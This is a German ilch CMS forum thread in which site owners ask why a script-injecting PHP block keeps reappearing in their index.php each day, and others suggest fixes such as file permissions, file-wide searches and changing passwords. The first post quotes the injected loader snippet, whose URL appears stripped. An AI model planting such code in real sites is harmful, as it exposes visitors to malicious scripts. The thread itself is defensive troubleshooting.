Ich habe folgendes Problem,
jeden Tag darf ich in der Datei Abschnitt 29 (in der index.php script seite)(fett unterlegt) (nicht in der index.html)
}
?>
<?php
#6a96a8#
if(empty($yrur)) {
$yrur = "<script src=\"" type=\"text/javascript\"></script>";
echo $yrur;
}
#/6a96a8#
?>
einen Eintrag entfernen der auf unserer Seite ein Javewarnungen aufpopen lässt entfernen, da dort immer wieder neu einträge reingeschrieben werden), obwohl der Chmod (Filezilla) ist auf "750" eingestellt ist.
Wie kann ich das verhindern, das dort Täglich eine "url" automatisch eingetragen wird ?!
Für Eure Hilfe bin ich sehr dankbar....
verwendete ilch Version: 1.1 P
betroffene Homepage: externer Link
Zuletzt modifiziert von Nudelholz am 16.01.2014 - 13:11:21
Beitrag zur Merkliste hinzufügen
Hier kann eine Notiz zum Merk-Eintrag hinzugefügt werden (optional)
ilch Forum » Ilch Clan 1.1 » Fehlersuche und Probleme » Javascript in der index.php Seite
| Geschlossen | ||
-
Do. 16.01.2014
12:45 Uhr
#1
- Registriert seit
- 29.11.2013
- Beiträge
- 8
- Beitragswertungen
-
Do. 16.01.2014
16:02 Uhr
#2
- Registriert seit
- 16.06.2011
- Beiträge
- 1.096
- Beitragswertungen
Ja ganz ehrlich, ich suche auch noch eine Lösung für das Problem. Bei mir waren 95 Dateien befallen. Ich habe alle Dateien durchsucht und alle Java Scripts entfernt, anschließend alles wieder hoch geladen und schwub einen Tag später dasselbe in Grün. -
Do. 16.01.2014
16:43 Uhr
#3
- Registriert seit
- 17.11.2005
- Beiträge
- 4.606
- Beitragswertungen
ja da hat euer Server vermutlich einen Virus ... ich würde die kiste neu aufsetzen oder dem betreiber des hosting pakets melden ... vermutlich sind irgendwelche php dateien oder js dateien befallen die das auslösen!
an ilch liegt das nicht -
Do. 16.01.2014
16:48 Uhr
#4
- Registriert seit
- 16.06.2011
- Beiträge
- 1.096
- Beitragswertungen
Ok Danke Holz ich rufe da gleich mal an. -
Do. 16.01.2014
16:53 Uhr
#5
- Registriert seit
- 17.11.2005
- Beiträge
- 4.606
- Beitragswertungen
ok gib dann feedback was die sagen
-
Do. 16.01.2014
17:09 Uhr
#6
- Registriert seit
- 16.06.2011
- Beiträge
- 1.096
- Beitragswertungen
Ok also Strato meinte am Server kann es definitiv nicht liegen...hmmmm jetzt durchsuche ich noch mal alles.... -
Do. 16.01.2014
17:18 Uhr
#7
- Registriert seit
- 17.11.2005
- Beiträge
- 4.606
- Beitragswertungen
hast du ein hosting-paket oder einen v-server?
weil bei einem hosting-paket kannst du ja nichts ausrichten außer die daten die hochgeladen hast sind verseucht
ist es ein vserver bist du ja für alles selbst verantwortlich
ich würd mal alle daten per batch oder shell durchsuchen und nach dem string der eingefügt wird durchsuchen .. -
Do. 16.01.2014
17:25 Uhr
#8
- Registriert seit
- 16.06.2011
- Beiträge
- 1.096
- Beitragswertungen
Bei der Domain handelt es sich um ein Hosting Paket. Ich hab schon mehrere male alles durchsucht. Ich kann auch nur nach einem Teil von String suchen da es eine Id hat welche sich ständig ändert. -
Do. 16.01.2014
17:26 Uhr
#9
- Registriert seit
- 17.11.2005
- Beiträge
- 4.606
- Beitragswertungen
das ist aber komisch -
Do. 16.01.2014
17:31 Uhr
#10
- Registriert seit
- 29.11.2013
- Beiträge
- 8
- Beitragswertungen
wie bei mir, auch ein Hosting Packet (DomainBox), laut deren Aussage ist alles absolut ok.
Ich habe auch Anti maleware Byte drüber laufen lassen, jedoch keine Fehler gefunden....
Ich habe nun alle Daten runter geladen, mit MalewareBytes überprüft, dann ein neues PW installiert und die Install.php neu drauf gemacht und nun warte ich mal ab bis morgen, ob der, ich nenne es mal maleware Befund wieder erscheint......
Zuletzt modifiziert von Nudelholz am 16.01.2014 - 17:32:18 -
Do. 16.01.2014
17:35 Uhr
#11
- Registriert seit
- 17.11.2005
- Beiträge
- 4.606
- Beitragswertungen
naja das nützt so nix ... das sind code fragmente im code die das auslösen ... virenscanner finden das so nicht ... -
Do. 16.01.2014
17:53 Uhr
#12
- Registriert seit
- 29.11.2013
- Beiträge
- 8
- Beitragswertungen
kann man dann den Code nicht so ändern, das es erst gar nicht zugelassen wird, das dort sich ein Program rein schreiben kann?
Sorry, blöde frage, aber ich kenn mich halt nicht so aus
......
-
Do. 16.01.2014
17:53 Uhr
#13
- Registriert seit
- 16.06.2011
- Beiträge
- 1.096
- Beitragswertungen
So, ich hab jetzt noch mal alles überprüft und neu hoch geladen. Die Einträge in der DB habe ich auch überprüft. Zusätzlich habe ich mal den Ip-Banner installiert da mir aufgefallen ist das eine Ip sehr häufig aktiv ist. Jetzt heißt es, wieder warten bis Morgen und dann noch mal sehen was passiert. -
Do. 16.01.2014
18:05 Uhr
#14
- Registriert seit
- 29.11.2013
- Beiträge
- 8
- Beitragswertungen
naja, ein IP Banner wird nichts viel nützen, denn Du muss jedesmal die IP selbst eintragen und das geht ja auch nur, wenn das system schon angegriffen wurde...:(.
Weiß nicht so recht, ob das was nützt, denn ich will im vorfeld das verhindern und nicht erst, wenn es schon passiert ist um eine ip copy&paste -
Do. 16.01.2014
18:15 Uhr
#15
- Registriert seit
- 16.06.2011
- Beiträge
- 1.096
- Beitragswertungen
Naja ein Versuch ist es wert. Besser so als nichts machen.
-
Do. 16.01.2014
18:50 Uhr
#16
- Registriert seit
- 16.06.2006
- Beiträge
- 15.334
- Beitragswertungen
Naja man kann die Schreibrechte entfernen, also 440 z.B. geben, dann dürfte nichts mehr reingeschrieben werden.
Es wäre halt interessant, wer die Änderungen macht, der Webserveruser oder der Ftpuser, wenn es der gleiche ist, ists natürlich schwer herauszufinden.
Ggf. auch auf das Änderungsdatum der Datei achten und dann in den access.log schauen, was zu dem Zeitpunkt aufgerufen wurde, das würde allerdings nur zu etwas führen, wenn die Änderungen nicht über FTP oder von Server selbst erfolgen.
Es wurde ja immer wieder berichtet, dass Filezilla die Passwörter im Klartext speichert und deswegen nicht verwendet werden sollte, zumindest, wenn man die Passwörter speichert. Aber selbst dann muss erstmal was auf dem privaten Rechner sein, dass die Passwörter ausspioniert.Und auch immer mal ein Blick auf die FAQ werfen. | Mairus Ilchseite -
Do. 16.01.2014
19:46 Uhr
#17
- Registriert seit
- 17.11.2005
- Beiträge
- 4.606
- Beitragswertungen
ich hatte sowas auf einem server auch mal ... weiß nimmer genau ob es jetzt eine verseuechte js datei oder php datei war die andere dateien immer bearbeitet hat ... wie suchst du denn über alle dateien hin weg? vielleicht können wir dir hier tipps geben ... -
Do. 16.01.2014
20:48 Uhr
#18
- Registriert seit
- 29.11.2013
- Beiträge
- 8
- Beitragswertungen
also bei mir ist es nur die "index.php" Datei.
Alle anderen Datein bei ir sind zu 100% Sauber und waren auch noch nie angegriffen, eben halt nur diese eine "index.php" Datei ist es.
Bei Filezilla ist mein PW mit ******* gekennzeichnet, kann man also nicht lesen
Zuletzt modifiziert von Nudelholz am 16.01.2014 - 20:49:04
Die schreibrechte hab ich jetzt mal auf die 440 geändert, die waren vorher auf 644 ........
Zuletzt modifiziert von Nudelholz am 16.01.2014 - 20:50:37 -
Do. 16.01.2014
20:57 Uhr
#19
- Registriert seit
- 17.11.2005
- Beiträge
- 4.606
- Beitragswertungen
ja befallen ist nicht die index.php
sondern eine andere xbelibige datei ... und diese fügt dann besagten code-schnipsel in die index.php -
Do. 16.01.2014
21:01 Uhr
#20
- Registriert seit
- 16.06.2011
- Beiträge
- 1.096
- Beitragswertungen
Wie gesagt bei mir waren es um die 95 Dateien... ich hatte unter anderem auch nach der Adresse im JavaScript gesucht. -
Do. 16.01.2014
21:01 Uhr
#21
- Registriert seit
- 21.03.2007
- Beiträge
- 7.642
- Beitragswertungen
Ich hatte mal einen User von diesen Mist befreit und da war eine ilch-fremde Datei in dem img/ Ordner versteckt. -
Do. 16.01.2014
21:03 Uhr
#22
- Registriert seit
- 17.11.2005
- Beiträge
- 4.606
- Beitragswertungen
erzählt doch mal wie ihr danach sucht das würde mich mal interessieren ... -
Do. 16.01.2014
21:07 Uhr
#23
- Registriert seit
- 16.06.2011
- Beiträge
- 1.096
- Beitragswertungen
Ok Lord ich schau gleich mal nach.Ich Finde es nur komisch, das letzte mal das ich was an der domain geändert habe ist fast ein halbes Jahr her und kein anderer hat einen Zugang also kann es ja auch nicht an filezilla liegen, dann könnte ich mir auch nur vorstellen das es an den rechten liegt. -
Do. 16.01.2014
21:10 Uhr
#24
- Registriert seit
- 29.11.2013
- Beiträge
- 8
- Beitragswertungen
naja, ich öffne jede .php datei mit Dreamweaver und geh auf suchen und gib dort den namen ein der url, die er reingeschrieben hat.
Und diese war halt nur in der index.php drinne -
Do. 16.01.2014
21:19 Uhr
#25
- Registriert seit
- 17.11.2005
- Beiträge
- 4.606
- Beitragswertungen
naja sowas hab ich vermutet .. das ist natürlich quark ...
dann nimm lieber mal so ein tool wie das hier:
externer Link
das ist einsame spitze ... du kannst hier oder dir deine eigenes batch script zu schreiben ... was auch nur ein einzeiler wäre kompfortabel suchen
du gibst den pfad an in dem duch suchen willst ... den dateityp in diesemfall machst du *.* weil du alle dateien durchsuchen willst oder zumindest *.html, *.php, *.js die solltest du auf jedenfall durchsuchen!
und dann gibst du einen teil des suchstrings ein ... den musst du auch escapen schau mal in der hilfe wie die genaue synthax ist ...
dann durchucht dir das tool alle dateien ab gegeben wurzel pfad ... das geht paar sekunden und du wiest bescheid .. -
Fr. 17.01.2014
09:22 Uhr
#26
- Registriert seit
- 16.06.2006
- Beiträge
- 15.334
- Beitragswertungen
Nur weil **** im Programm steht, ist das Passwort nicht sicher gespeichert, schau mal in die C:\Users\DEINNUTZER\AppData\Roaming\FileZilla\filezilla.xml bzw. bookmarks.xml
Zuletzt modifiziert von Mairu am 17.01.2014 - 09:22:56Und auch immer mal ein Blick auf die FAQ werfen. | Mairus Ilchseite -
Fr. 17.01.2014
13:19 Uhr
#27
- Registriert seit
- 29.11.2013
- Beiträge
- 8
- Beitragswertungen
sooooooooooooooo, also bis jetzt ist bei mir noch nichts rein geschrieben worden...alle so wie es sein soll
Gestern um diese Zeit war meine index.php schon versucht....
Bleibt zu hoffen, ds dies nun auch so sauber bleibt.....
Meine Schritte waren wie folgt.
1. Löschen der index.php vom Server
2. Neue PW gewählt & Original Daten wieder hochgeladen und neu die install.php installiert
3. Den Chmod auf 440 (Filezilla) gestellt.
Wie gesagt und bis jetzt ist alles sauber und zu 100% Einwandfrei !
Sollte sich bis Sonntag was ändern werd ich es hier Posten.
Zuletzt modifiziert von Siggi am 17.01.2014 - 13:31:04
| Geschlossen | ||
 |
Zurück zu Fehlersuche und Probleme | |
Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten